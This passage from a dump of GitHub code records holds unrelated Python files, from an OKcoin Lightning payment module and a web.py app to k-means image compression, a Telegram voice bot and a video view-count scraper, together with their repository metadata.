round((float(pos_payment_obj.get('amount')) / float(okcoin_conversion_rate)) * 100000000, 0) #conversion to satoshis and rounding to one decimal\n invoiced_info = {'conversion_rate': okcoin_conversion_rate,\n 'invoiced_sat_amount': amount_sats\n }\n return invoiced_info #return dictionary with results of both functions\n except Exception as e:\n _logger.info(\"amount sats exception\")\n raise UserError(_(\"Get Millisat amount: %s\", e.args))\n\n\n def action_check_lightning_invoice(self, lightning_invoice_id): #checks status of lightning invoices, only\n try:\n request_path = '/api/v5/asset/deposit-history?ccy=BTC' #+ lightning_invoice_id\n body = ''\n type = \"GET\"\n response = self.query(type, request_path, body)\n response_json = response.json()\n results = response_json.get('data') if response.status_code == 200 else None\n for result in results:\n if result.get('to') == lightning_invoice_id:\n return result\n return {'state':'-1'}\n except Exception as e:\n raise UserError(_(\"Check OKcoin Lightning Invoice: %s\", lightning_invoice_id, e.args))\n\n\n def action_sell(self, pos_payment_obj): #checks status of lightning invoices, only\n try:\n invoiced_sat_amount = pos_payment_obj.get('invoiced_sat_amount')\n convert_percent = self.convert_percent\n _logger.info(invoiced_sat_amount)\n conversion_sat_amount = (invoiced_sat_amount/100000000)*(convert_percent/100)\n _logger.info(conversion_sat_amount)\n request_path = '/api/v5/trade/order'\n body = {\n \"instId\":\"BTC-USD\",\n \"tdMode\":\"cash\",\n \"clOrdId\":\"test\",\n \"side\":\"sell\",\n \"ordType\":\"market\",\n \"sz\":str(conversion_sat_amount)} #minimum - 0.0001\n type = \"POST\"\n _logger.info(body)\n response = self.query(type, request_path, body)\n response_json = response.json()\n _logger.info(response_json)\n result = response_json.get('data')[0] if response.status_code == 200 else None\n _logger.info(result)\n if result.get('clOrdId') == \"test\":\n if result.get('sCode') == \"0\":\n _logger.info(result)\n return result\n else:\n result = {'sCode':'-1', 'clOrdId':clOrdId}\n _logger.info(result)\n return result\n except Exception as e:\n _logger.info(\"sale order exception\")\n raise UserError(_(\"Check OKcoin Lightning Invoice: %s\", lightning_invoice_id, e.args))","repo_name":"ERP-FTW/mlr_pos_exchanger","sub_path":"models/okcoin_instance.py","file_name":"okcoin_instance.py","file_ext":"py","file_size_in_byte":10708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4546062651","text":"#!/usr/bin/env python\n# coding: utf-8\n#########################################################################\n#Name:codeMain.py \n#BY yu \n#Discription:OPen \n# \n######################################################################### \nimport web\nimport os\nimport userApi\nimport pymongo\nimport MongodbApi\nimport ArticleApi\nimport SectionApi\n#import dbMongoApi\n#import sys \n#default_encoding = 'utf-8' \n#if sys.getdefaultencoding() != default_encoding: \n# reload(sys) \n# sys.setdefaultencoding(default_encoding)\nClient=pymongo.MongoClient('localhost',27017)\nconn=Client.afterWard\n#web.config.debug = False\nurls = (\n '/','index',\n '/mars/signup', 'userApi.signUp',\n '/mars/signin', 'userApi.signIn',\n '/mars/signout','userApi.signOut',\n '/mars/datebase','MongodbApi.mongoDate',\n '/mars/article/(.+)','ArticleApi.Articles',\n '/mars/section' , 'SectionAPi.Sections',\n \"/set\", \"CookieSet\",\n \"/get\", \"CookieGet\",\n \"/session\",\"sessions\",\n \"/mars\",\"index\",\n \"/mars/user\",\"userApi.userData\"\n)\napp_root = os.path.dirname(__file__)\ntemplates_root = os.path.join(app_root,'temp')\nrender = web.template.render(templates_root)\nclass CookieSet:\n def GET(self):\n web.setcookie(\"age\", \"23\", 10)\n return \"Your cookie is create\"\n\nclass CookieGet:\n def GET(self):\n try:\n return \"Your age is : \" + web.cookies().age\n except:\n return \"Your cookie doesn't exists\"\nclass index:\n def __init__(self):\n self.app_root = os.path.dirname(__file__)\n self.templates_root = os.path.join(self.app_root,'temp')\n self.render = web.template.render(self.templates_root)\n def GET(self):\n return self.render.test1()\n def POST(self):\n dic=web.input()\n #dic.pop(\"action\")\n \n return dic\nclass sessions:\n def __init__(self):\n self.app_root = os.path.dirname(__file__)\n self.templates_root = os.path.join(self.app_root,'temp')\n self.render = web.template.render(self.templates_root)\n def GET(self):\n return web.config._session.logIn\n\n# session = web.session.Session(app, web.session.DiskStore('sessions'))\n \n# web.wsgi.runwsgi = lambda func, addr=None: web.wsgi.runfcgi(func, addr)\n# def session_hook():\n# web.ctx.session = session\n# app.add_processor(web.loadhook(session_hook))##print web.ctx.session.xxx\napp = web.application(urls, globals())\nif web.config.get('_session') is None:\n session = web.session.Session(app, web.session.DiskStore('sessions'),initializer={'logIn':'False','userName':None})\n web.config._session = session\nelse:\n session = web.config._session\nif __name__ == \"__main__\":\n \n app.run()\n ","repo_name":"Icafe8/afterWard","sub_path":"codeMain.py","file_name":"codeMain.py","file_ext":"py","file_size_in_byte":3059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6969233482","text":"from theblockchainapi import BlockchainAPIResource, Blockchain, BlockchainNetwork\nimport json\n\n# Get an API key pair for free here: https://dashboard.blockchainapi.com/api-keys\nMY_API_KEY_ID = None\nMY_API_SECRET_KEY = None\n\nBLOCKCHAIN = Blockchain.SOLANA\nNETWORK = BlockchainNetwork.SolanaNetwork.MAINNET_BETA\n# NETWORK = BlockchainNetwork.SolanaNetwork.DEVNET\n\n# BLOCKCHAIN = Blockchain.ETHEREUM\n# NETWORK = BlockchainNetwork.EthereumNetwork.MAINNET\n# NETWORK = BlockchainNetwork.EthereumNetwork.ROPSTEN\n\nBLOCKCHAIN_API_RESOURCE = BlockchainAPIResource(\n api_key_id=MY_API_KEY_ID,\n api_secret_key=MY_API_SECRET_KEY,\n blockchain=BLOCKCHAIN,\n network=NETWORK\n)\n\n\ndef example():\n try:\n assert MY_API_KEY_ID is not None\n assert MY_API_SECRET_KEY is not None\n except AssertionError:\n raise Exception(\"Fill in your key ID pair!\")\n\n rpc_url = BLOCKCHAIN_API_RESOURCE.get_rpc_url()\n\n print(\n f\"You can use this RPC URL for `{BLOCKCHAIN.value}`, `{NETWORK.value}`; \"\n f\"but make sure to include your API keys in the headers. \\n\\n {rpc_url}\"\n )\n\n rpc_response = BLOCKCHAIN_API_RESOURCE.make_rpc_request(\n method='getBlockTime',\n params=[\n 135659086\n ]\n )\n\n # In progress....\n print(rpc_response)\n print(json.dumps(rpc_response, indent=4))\n\n\nif __name__ == '__main__':\n example()\n","repo_name":"BL0CK-X/blockchain-api","sub_path":"examples/rpcs/call-rpc/python_example.py","file_name":"python_example.py","file_ext":"py","file_size_in_byte":1382,"program_lang":"python","lang":"en","doc_type":"code","stars":62,"dataset":"github-code","pt":"21"} +{"seq_id":"13338279403","text":"import simpleNN\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\n\r\n\r\ndef trainNetworks():\r\n maxIter = 100 #DEFAULT\r\n lmbd = [0, 0.2, 0.5, 0.7, 1] #DEFAULT\r\n alpha = [0.1, 0.5, 1, 2] #DEFAULT\r\n pairs = ()\r\n for alphaValue in alpha:\r\n for lambdaValue in lmbd:\r\n pairs = pairs + ((alphaValue, lambdaValue),)\r\n print(pairs)\r\n\r\n\r\n Theta1 = np.zeros((20, 170, 25))\r\n Theta2 = np.zeros((20, 26, 10))\r\n Theta3 = np.zeros((20, 11, 1))\r\n # Theta1 = np.load('metaAnalysisTheta1.npy')\r\n # Theta2 = np.load('metaAnalysisTheta2.npy')\r\n # Theta3 = np.load('metaAnalysisTheta3.npy')\r\n\r\n\r\n #costHistory = np.load('costHistory.npy')\r\n costHistory = np.empty((20, 100))\r\n print('Examples without recorded history:',np.sum(costHistory[0, :] == 0))\r\n finalCost = np.zeros(20)\r\n\r\n\r\n for count in range(0,20):\r\n alphaValue = pairs[count][0]\r\n lambdaValue = pairs[count][1] \r\n print('Training Network with Alpha = {0}, Lambda = {1}'.format(alphaValue, lambdaValue))\r\n (Theta1[count], Theta2[count], Theta3[count], costHistory[count]) = simpleNN.main(\r\n 'y training', maxIter, lambdaValue, alphaValue)\r\n\r\n finalCost[count] = costHistory[count][-1]\r\n \r\n\r\n #This line saves all theta values as a 3 dimensional array for later access.\r\n np.save(\"metaAnalysisTheta1.npy\", np.array(Theta1))\r\n np.save(\"metaAnalysisTheta2.npy\", np.array(Theta2))\r\n np.save(\"metaAnalysisTheta3.npy\", np.array(Theta3))\r\n np.save('costHistory.npy', costHistory)\r\n\r\n print('Saved. Iteration', str(count) + '.')\r\n\r\n\r\n\r\n\r\ndef CVTest():\r\n '''CV Test\r\n This function is built to use the various networks trained by the trainNetworks, or with some \r\n minor modification any trained network with the normal interface, and test each against the CV \r\n data set for comparison and evaluation purposes of various settings when training the networks.\r\n '''\r\n \r\n #These 3D vectors are, usually, each collections of 20 2D theta value matrices.\r\n Theta1 = np.load('metaAnalysisTheta1.npy')\r\n Theta2 = np.load('metaAnalysisTheta2.npy')\r\n Theta3 = np.load('metaAnalysisTheta3.npy')\r\n\r\n (X, Y) = simpleNN.loadNewData('CV')\r\n #X = np.load('XCV.npy')\r\n #Y = np.load('YCV.npy')\r\n m = np.size(X, 0)\r\n\r\n finalCosts = np.empty(20)\r\n F1 = np.empty(20)\r\n for i in range(0, 20):\r\n prediction = simpleNN.forwardProp(X, Theta1[i], Theta2[i], Theta3[i])\r\n print('predict[0:5]:', prediction[:5])\r\n\r\n correctError = np.multiply(-Y, np.log(prediction))\r\n incorrectError = np.multiply(1 - Y, np.log(1 - prediction))\r\n J = correctError - incorrectError\r\n J = np.sum(J)\r\n finalCosts[i] = J / m #the final cost, without regularization\r\n \r\n prediction = np.array(prediction > 0.5, dtype=int)\r\n truePos = np.sum( np.logical_and( prediction == 1, Y == 1)) + 1\r\n falsePos = np.sum( np.logical_and( prediction == 1, Y == 0))\r\n falseNeg = np.sum( np.logical_and( prediction == 0, Y == 1))\r\n \r\n precision = np.divide(truePos, truePos + falsePos)\r\n recall = np.divide(truePos, truePos + falseNeg)\r\n \r\n F1[i] = (2 * precision * recall) / (precision + recall)\r\n\r\n\r\n\r\n\r\n print('Normal Costs,', finalCosts)\r\n print('F1 Scores,', F1)\r\n plt.plot(finalCosts)\r\n plt.plot(F1)\r\n plt.show()\r\n\r\n inp = input('Done?')\r\n\r\n\r\nCVTest()\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n# userDecision = 'y'\r\n\r\n# while userDecision == 'y':\r\n\r\n # userDecision = input(\"Look at the next graph? y/n \")\r\n \r\n","repo_name":"robbwdoering/AutoFono","sub_path":"metaAnalysisNN.py","file_name":"metaAnalysisNN.py","file_ext":"py","file_size_in_byte":3719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35967092023","text":"# -*- coding: utf-8 -*-\n\"\"\"module for running tmux commands and parsing output thereof.\n\n\"\"\"\n\nimport logging\nimport subprocess\nfrom typing import Dict, List\n\nfrom scry.bin_utils import find_bin_in_path\n\ntmux_binary = find_bin_in_path(\"tmux\")\n\"\"\" str: fully qualified path of tmux binary\n\"\"\"\n\n_TMUX_FORMAT_SEPARATOR = \"__SEPARATOR__\"\n\"\"\" str: Format separator to use for tmux -F format constructions\n\"\"\"\n\n_LOGGER = logging.getLogger(__name__)\n\n\nclass TmuxCmd(object):\n def __init__(self, cmd_args: List[str]):\n \"\"\"\n\n Args:\n cmd_args: arguments to pass to tmux binary\n \"\"\"\n\n self._tmux_bin = tmux_binary\n self._tmux_args = cmd_args\n self._cmd_executed: bool = False\n self._cmd: subprocess.CompletedProcess = None\n\n self._execute_cmd()\n\n def _execute_cmd(self) -> None:\n cmd = subprocess.run([self._tmux_bin] + self._tmux_args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\n _LOGGER.debug(f\"{cmd.stdout}\")\n\n if cmd.returncode != 0:\n raise RuntimeError(f\"tmux returned nonzero with stderr: {cmd.stderr}\")\n\n # Set the executed flag and save the CompletedProcess obj\n self._cmd = cmd\n self._cmd_executed = True\n\n @property\n def stdout(self) -> List[str]:\n if self._cmd_executed:\n stdout = self._cmd.stdout.decode(\"utf-8\")\n return stdout.splitlines()\n\n else:\n raise ValueError(\"tmux command did not execute correctly; no stdout.\")\n\n\nclass TmuxFmtCmd(TmuxCmd):\n \"\"\"Like a regular TmuxCmd object, but we return a parsed stdout from a tmux format\"\"\"\n\n def __init__(self, args: List[str], fmt_keys: List[str]):\n self._fmt_keys = fmt_keys\n\n fmt_string = self._format_tmux_keys(fmt_keys)\n args += [\"-F\", fmt_string]\n\n super(TmuxFmtCmd, self).__init__(args)\n\n @staticmethod\n def _format_tmux_keys(fmt_keys: List[str]) -> str:\n \"\"\"reformat keys to tmux-style '#{key}' strings\"\"\"\n fmt_keys = [f\"#{{{key}}}\" for key in fmt_keys]\n fmt_string = _TMUX_FORMAT_SEPARATOR.join(fmt_keys)\n return fmt_string\n\n @property\n def stdout(self) -> List[Dict[str, str]]:\n if self._cmd_executed:\n _ret = list()\n\n stdout = self._cmd.stdout.decode(\"utf-8\")\n for line in stdout.splitlines():\n _LOGGER.debug(f\"line: {line}\")\n line_vals = line.split(sep=_TMUX_FORMAT_SEPARATOR)\n\n # Create a dict using the fmt_keys as the keys\n _ret.append(dict(zip(self._fmt_keys, line_vals)))\n return _ret\n\n else:\n raise ValueError(\"tmux command did not execute correctly; no stdout.\")\n\n\ndef tmux_create_detached(session_name: str):\n subprocess.run([tmux_binary, \"new-session\", \"-s\", session_name, \"-d\"])\n\n\ndef tmux_attach(session_id: str):\n subprocess.run([tmux_binary, \"attach-session\", \"-t\", session_id])\n","repo_name":"davidr/scry","sub_path":"scry/tmuxcmd.py","file_name":"tmuxcmd.py","file_ext":"py","file_size_in_byte":2945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5225287647","text":"data = open('day04/in4', 'r').read().split('\\n')\n\n# Puzzle1\nl = [tuple(s.replace('-',',').split(',')) for s in data]\nlst = [tuple(int(s) for s in li) for li in l]\ncrit = [i for i,tup in enumerate(lst) if ((tup[0]>=tup[2] and tup[1]<=tup[3]) | (tup[2]>=tup[0] and tup[3]<=tup[1])) ]\nprint(f'Result1: {len(crit)}')\n\n# Puzzle2\nc = [i for i,tup in enumerate(lst) if ((tup[1]>=tup[2] and tup[0]<=tup[3]) | (tup[3]>=tup[0] and tup[2]<=tup[1])) ]\nprint(f'Result2: {len(c)}')","repo_name":"kjbrak/AoC_2022","sub_path":"day04/day4.py","file_name":"day4.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27688000835","text":"from telegram.ext import Updater\nfrom telegram.ext import CommandHandler\nfrom telegram.ext import MessageHandler, Filters\nimport redis\nimport io\nimport os\n\nr = redis.StrictRedis(host='localhost', port=6379, db=1)\n\n\ndef start(bot, update):\n bot.send_message(chat_id=update.message.chat_id, text=\"Я бот сохраняющий голосовые сообщения!\")\n\n\ndef save_audio(bot, update):\n voice_id = update.message.voice.file_id\n user_id = update.message.from_user.id\n file = bot.get_file(voice_id)\n bot.send_message(chat_id=update.message.chat_id, text=\"Сохраняю...\")\n with io.BytesIO() as buf:\n file.download(out=buf, timeout=10)\n r.rpush(str(user_id), buf.getbuffer().tobytes())\n\n\ntoken = os.environ['token']\nupdater = Updater(token=token)\n\ndispatcher = updater.dispatcher\n\nstart_handler = CommandHandler('start', start)\nimg_handler = MessageHandler(Filters.voice, save_audio)\n\ndispatcher.add_handler(start_handler)\ndispatcher.add_handler(img_handler)\n\nupdater.start_polling()\n\n","repo_name":"aleksl0l/telegram-bot-savevoice","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37784819172","text":"import argparse\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-f\", help=\"Path to file to run verify on\")\n args = parser.parse_args()\n\n word_set = set()\n with open(args.f, 'r') as fp:\n lines = fp.readlines()\n\n print(\"Evaluating {} lines\".format(len(lines)))\n\n dup_count = 0\n\n for line in lines:\n if line in word_set:\n print(\"Found repeated word {}\".format(line))\n dup_count += 1\n else:\n word_set.add(line)\n\n print(\"Duplicate count {}\".format(dup_count))\n","repo_name":"JamieERMerrill/BoggleSolver","sub_path":"BoggleSolver/scripts/validate_no_repeats.py","file_name":"validate_no_repeats.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37402483920","text":"import random\n\n\ndef converting_graph6(str_graph):\n byte = str_graph.encode('UTF-8')\n n = byte[0] - 63\n graph = {i: [] for i in range(n)}\n code_string = \"\"\n for i in range(1, len(byte)):\n code_string += format(byte[i] - 63, '06b')\n counter = 0\n for i in range(1, n):\n for j in range(i):\n if code_string[counter] == \"1\":\n graph[j].append(i)\n graph[i].append(j)\n counter += 1\n vertex = [i for i in range(len(graph))]\n edges = []\n for i in range(len(graph)):\n for j in graph[i]:\n edges.append((i, j))\n return vertex, edges\n\n\ndef dominant(graph):\n vertex, edges = converting_graph6(graph)\n\n gVertices = {i for i in vertex}\n\n #print('Vertices in the Graph = ', gVertices)\n gEdges = edges\n for (a, b) in gEdges:\n if (b, a) in gEdges:\n gEdges.remove((b, a))\n #print('\\nEdges in the Graph = ', gEdges)\n yellow = gVertices\n startVer = random.choice(list(gVertices))\n Nbr = set()\n minDOM = set()\n\n S = set()\n degrees = dict()\n connectedMinSet = []\n\n while len(gVertices) != 0:\n\n def findDegrees():\n for vertex in gVertices:\n deg = 0\n for edge in gEdges:\n if vertex in edge:\n deg = deg + 1\n else:\n None\n degrees[vertex] = deg\n return degrees\n\n findDegrees()\n maxDegree = max(degrees.values())\n for i in degrees:\n if degrees.get(i) == maxDegree:\n S.add(i)\n maxvertex = i\n\n nbrmaxvertex = set()\n nbrmaxvertex.add(maxvertex)\n gVerticesNew = set()\n for edg in enumerate(gEdges):\n\n if edg[1][0] == maxvertex:\n nbrmaxvertex.add(edg[1][1])\n elif edg[1][1] == maxvertex:\n nbrmaxvertex.add(edg[1][0])\n\n connectedMinSet.append(nbrmaxvertex)\n gVerticesNew = gVertices - nbrmaxvertex\n gVertices = gVerticesNew\n\n for v in gEdges:\n for e in gEdges:\n if maxvertex in e:\n gEdges.remove(e)\n\n degrees = dict()\n\n return len(connectedMinSet)","repo_name":"lost-20/NIR","sub_path":"Dominant_number.py","file_name":"Dominant_number.py","file_ext":"py","file_size_in_byte":2269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32032564021","text":"f = open('../3.txt')\nw = [int(s) for s in f.readlines()]\ncountP = 0\nmaxS = -1\nfor i in range(1,len(w)):\n q = w[i] + w[i-1]\n if (w[i] % 3 == 0 or w[i-1] % 3 == 0) and q % 5 == 0:\n countP += 1\n if q > maxS:\n maxS = q\nprint(countP, maxS)\nf.close()\n","repo_name":"ivbachantcev/EGEBurg_2022","sub_path":"ПР9. Работа с файлами/Решения/z3.py","file_name":"z3.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31135142261","text":"#!/usr/bin/env python\n\nfrom setuptools import setup\nimport os\nimport colorutils\n\n\nif os.path.exists('README.rst'):\n description_long = open('README.rst').read()\nelse:\n description_long = \"\"\" A utility which allows you to work with colors in Python. \"\"\"\n\n\nsetup(\n name='colorutils',\n packages=['colorutils'],\n version=colorutils.__version__,\n license=colorutils.__license__,\n description=colorutils.__description__,\n long_description=description_long,\n author=colorutils.__author__,\n author_email=colorutils.__email__,\n url='https://github.com/edaniszewski/colorutils',\n download_url='https://github.com/edaniszewski/colorutils/releases/tag/0.1',\n keywords=['color', 'color manipulation', 'color conversion', 'color tools'],\n classifiers=[\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Natural Language :: English',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 2.7',\n 'Topic :: Utilities',\n ],\n)","repo_name":"edaniszewski/colorutils","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"37"} +{"seq_id":"36261652901","text":"import numpy as np\nimport random\nfrom matplotlib import pyplot as io\nimport os\nimport argparse\nimport numpy.matlib\n\nclass KMeans(object): \n def __init__(self, image_data, file_name, k=10, n_iterations=100):\n self.data = image_data\n self.k = k\n self.n_iterations = n_iterations\n self.f_name = file_name\n\n def prepare_image_vectors(self):\n rows = self.data.shape[0]\n cols = self.data.shape[1]\n vec_data = self.data.reshape(rows*cols, 3)\n return vec_data\n \n def init_centroids(self, data):\n return random.sample(list(data),self.k)\n \n def get_closest_centroids(self, data, centers):\n _size = np.size(data,0)\n idx = np.zeros((_size,1))\n record = np.empty((_size,1))\n for i in range(0,self.k):\n center = centers[i]\n sq_vec = np.power(np.subtract(data,center),2)\n distance = np.sum(sq_vec,axis = 1)\n distance.resize((_size,1))\n record = np.append(record, distance, axis=1)\n record = np.delete(record,0,axis=1)\n idx = np.argmin(record, axis=1)\n return idx\n\n def compute_centroids(self, data, idx):\n n = np.size(data,1)\n centroids = np.zeros((self.k, n))\n for i in range(0,self.k):\n ci = idx==i\n ci = ci.astype(int)\n total_number = sum(ci);\n ci.resize((np.size(data,0),1))\n total_matrix = numpy.matlib.repmat(ci,1,n)\n ci = np.transpose(ci)\n total = np.multiply(data,total_matrix)\n centroids[i] = (1/total_number)*np.sum(total,axis=0)\n return centroids \n \n def create_clusters(self, data, initial_centroids):\n m = np.size(data,0)\n n = np.size(data,1)\n centroids = initial_centroids\n previous_centroids = centroids\n idx = np.zeros((m,1))\n for i in range(1,self.n_iterations):\n idx = self.get_closest_centroids(data, centroids)\n centroids = self.compute_centroids(data, idx)\n return centroids,idx\n\n def save_image(self, image_data):\n img_name = 'output_'+ str(self.f_name) + '_k_' + str(self.k) + '_i_' + str(self.n_iterations) +'.jpg'\n io.imsave('output_'+ str(self.f_name) + '_k_' + str(self.k) + '_i_' + str(self.n_iterations) +'.jpg', image_data)\n print(\"Image {} Compressed with no_of_iterations = {} and k = {}\".format(self.f_name, self.n_iterations, self.k))\n image_compressed = io.imread('output_'+ str(self.f_name) + '_k_' + str(self.k) + '_i_' + str(self.n_iterations) +'.jpg')\n return os.path.getsize(img_name)\n \n def compressed_size(self, image):\n return (image.size)\n \n def fit(self):\n n_rows = self.data.shape[0]\n n_cols = self.data.shape[1]\n compressed_img = np.zeros((n_rows, n_cols, 3), dtype = np.uint8)\n image_vec = self.prepare_image_vectors()\n initial_centroids = self.init_centroids(image_vec)\n centroids,idx = self.create_clusters(image_vec, initial_centroids)\n idx = self.get_closest_centroids(image_vec,centroids)\n idx = idx.reshape(n_rows, n_cols)\n for i in range(n_rows):\n for j in range(n_cols):\n compressed_img[i, j, :] = centroids[idx[i, j], :]\n file_size = self.save_image(compressed_img)\n return file_size\n \n \nif __name__ == \"__main__\":\n ### Change Location Here ###\n data_loc = \"/Users/abhishekhosmani/CompSci/College/ML_Anjum/data/assignment5/\"\n summary = {}\n \n def visualize(compression):\n io.figure(figsize=(10,5))\n koala = io.plot(list(compression['koala.jpg'].keys()), list(compression['koala.jpg'].values()), label='koala', marker=\"s\", linewidth=3)\n penguine = io.plot(list(compression['Penguins.jpg'].keys()), list(compression['Penguins.jpg'].values()), label='Penguine', marker=\"o\", linewidth=3)\n io.legend()\n io.ylabel(\" File Size (in Bytes)\")\n io.xlabel(\" No of Clusters (K) \")\n io.show()\n \n files = ['koala.jpg', 'Penguins.jpg']\n for image_file in files:\n performance = {}\n image = io.imread(data_loc+image_file)\n\n for _k in [2,5,10,15,20]:\n model = KMeans(image, k=_k, n_iterations=2, file_name=image_file)\n performance[_k] = model.fit()\n print(\"Finished Compressing the \", image_file)\n summary[image_file] = performance\n visualize(summary)","repo_name":"AbhishekHosmani/ExploringML","sub_path":"ImageCompression_KMeans.py","file_name":"ImageCompression_KMeans.py","file_ext":"py","file_size_in_byte":4463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35134779521","text":"import json\nimport logging\nimport re\nfrom datetime import datetime\nfrom enum import Enum\nfrom typing import Union, List\n\nimport requests\nfrom bs4 import BeautifulSoup\n\nfrom i18n.i18n import _\nfrom utils.helpers import prompt_response, prompt_choices, http_get\nfrom utils.string import split_number\n\n\nclass VideoSite(Enum):\n NICO_NICO = \"niconico\"\n BILIBILI = \"bilibili\"\n YOUTUBE = \"YouTube\"\n\n\nclass Video:\n def __init__(self, site: VideoSite, identifier: str, url: str, views: int, uploaded: datetime,\n thumb_url: str = None, canonical: bool = True):\n self.site: VideoSite = site\n self.identifier: str = identifier\n self.url = url\n self.views: int = views\n self.uploaded: datetime = uploaded\n self.thumb_url: str = thumb_url\n self.canonical = canonical\n\n def __str__(self) -> str:\n return f\"VideoSite: {self.site}\\n\" \\\n f\"Id: {self.identifier}\\n\" \\\n f\"Views: {self.views}\\n\" \\\n f\"Uploaded: {self.uploaded}\\n\" \\\n f\"Thumb: {self.thumb_url}\\n\\n\"\n\n\ntable = 'fZodR9XQDSUm21yCkr6zBqiveYah8bt4xsWpHnJE7jL5VG3guMTKNPAwcF'\ntr = {}\nfor index in range(58):\n tr[table[index]] = index\ns = [11, 10, 3, 8, 4, 6]\nxor = 177451812\nadd = 8728348608\n\n\ndef av_to_bv(av: str) -> str:\n x = int(av[2:])\n x = (x ^ xor) + add\n r = list('BV1 4 1 7 ')\n for i in range(6):\n r[s[i]] = table[x // 58 ** i % 58]\n return ''.join(r)\n\n\ndef parse_nc_url(vid: str) -> str:\n if vid.find(\"nicovideo\") != -1:\n vid = vid[vid.rfind(\"/\") + 1:]\n return vid\n\n\ndef get_nc_info(vid: str) -> Video:\n vid = parse_nc_url(vid)\n url = f\"https://www.nicovideo.jp/watch/{vid}\"\n result = http_get(url, use_proxy=True).text\n soup = BeautifulSoup(result, \"html.parser\")\n date = datetime.fromtimestamp(0)\n views = 0\n for script in soup.find_all('script'):\n t: str = script.get_text()\n index_start = t.find(\"uploadDate\")\n if index_start != -1:\n index_start += len(\"uploadDate\") + 3\n date = t[index_start:index_start + 10]\n date = str_to_date(date)\n index_start = t.find(\"userInteractionCount\")\n if index_start != -1:\n index_start += len(\"userInteractionCount\") + 2\n index_end = t.find(\"}\", index_start)\n views = int(t[index_start:index_end])\n thumb = soup.find(\"meta\", {\"name\": \"thumbnail\"})['content']\n return Video(VideoSite.NICO_NICO, vid, url, views, date, thumb)\n\n\ndef get_bv(vid: str) -> str:\n search_bv = re.search(\"BV[0-9a-zA-Z]+\", vid, re.IGNORECASE)\n if search_bv is not None:\n return search_bv.group(0)\n search_av = re.search(\"av[0-9]+\", vid, re.IGNORECASE)\n if search_av is not None:\n return av_to_bv(search_av.group(0))\n return vid\n\n\ndef get_bb_info(vid: str) -> Video:\n vid = get_bv(vid)\n url = f\"https://api.bilibili.com/x/web-interface/view?bvid={vid}\"\n response = json.loads(http_get(url, use_proxy=False).text)\n epoch_time = int(response['data']['pubdate'])\n date = datetime.fromtimestamp(epoch_time)\n # remove extra information to be in sync with YT and Nico\n date = datetime(year=date.year, month=date.month, day=date.day)\n pic = response['data']['pic']\n views = response['data']['stat']['view']\n return Video(VideoSite.BILIBILI, vid, url, views, date, pic)\n\n\ndef parse_yt_url(vid: str) -> str:\n if vid.find(\"youtube.\") != -1:\n return vid[vid.find(\"=\") + 1:]\n elif vid.find(\"youtu.be\") != -1:\n return vid[vid.rfind(\"/\") + 1:]\n\n\ndef get_yt_info(vid: str) -> Union[Video, None]:\n vid = parse_yt_url(vid)\n url = 'https://www.youtube.com/watch?v=' + vid\n text = http_get(url, use_proxy=True).text\n soup = BeautifulSoup(text, \"html.parser\")\n interaction = soup.select_one('meta[itemprop=\"interactionCount\"][content]')\n views = int(interaction['content'])\n date = str_to_date(soup.select_one('meta[itemprop=\"datePublished\"][content]')['content'])\n return Video(VideoSite.YOUTUBE, vid, url, views, date,\n thumb_url=\"https://img.youtube.com/vi/{}/maxresdefault.jpg\".format(vid))\n\n\ninfo_func = {\n VideoSite.NICO_NICO: get_nc_info,\n VideoSite.BILIBILI: get_bb_info,\n VideoSite.YOUTUBE: get_yt_info\n}\n\n\ndef view_count_from_site(video: Video) -> str:\n # requires Python 3.10; too many compatibility issues\n # match video.site:\n # case VideoSite.NICO_NICO:\n # return f\"{{{{NiconicoCount|id={video.identifier}}}}}\"\n # case VideoSite.YOUTUBE:\n # return f\"{{{{YoutubeCount|id={video.identifier}|fallback={video.views}+}}}}\"\n # case VideoSite.BILIBILI:\n # return f\"{{{{BilibiliCount|id={video.identifier}}}}}\"\n # case _:\n # return \"ERROR\"\n if video.site == VideoSite.NICO_NICO:\n return f\"{{{{NiconicoCount|id={video.identifier}}}}}\"\n if video.site == VideoSite.YOUTUBE:\n return f\"{{{{YoutubeCount|id={video.identifier}}}}}\"\n if video.site == VideoSite.BILIBILI:\n return f\"{{{{BilibiliCount|id={video.identifier}}}}}\"\n return \"ERROR\"\n\n\ndef video_from_site(site: VideoSite, identifier: str, canonical: bool = True) -> Union[Video, None]:\n logging.info('Fetching video from ' + site.value)\n logging.debug(f\"Video identifier: {identifier}\")\n try:\n v = info_func[site](identifier)\n except Exception as e:\n logging.warning(_(\"fail_fetch\") + site.value)\n logging.debug(\"Detailed exception info: \", exc_info=e)\n v = None\n if not v:\n identifier = parse_yt_url(identifier) if site == VideoSite.YOUTUBE else parse_nc_url(identifier)\n return Video(site, identifier, \"\", 0, datetime.fromtimestamp(0))\n v.canonical = canonical\n 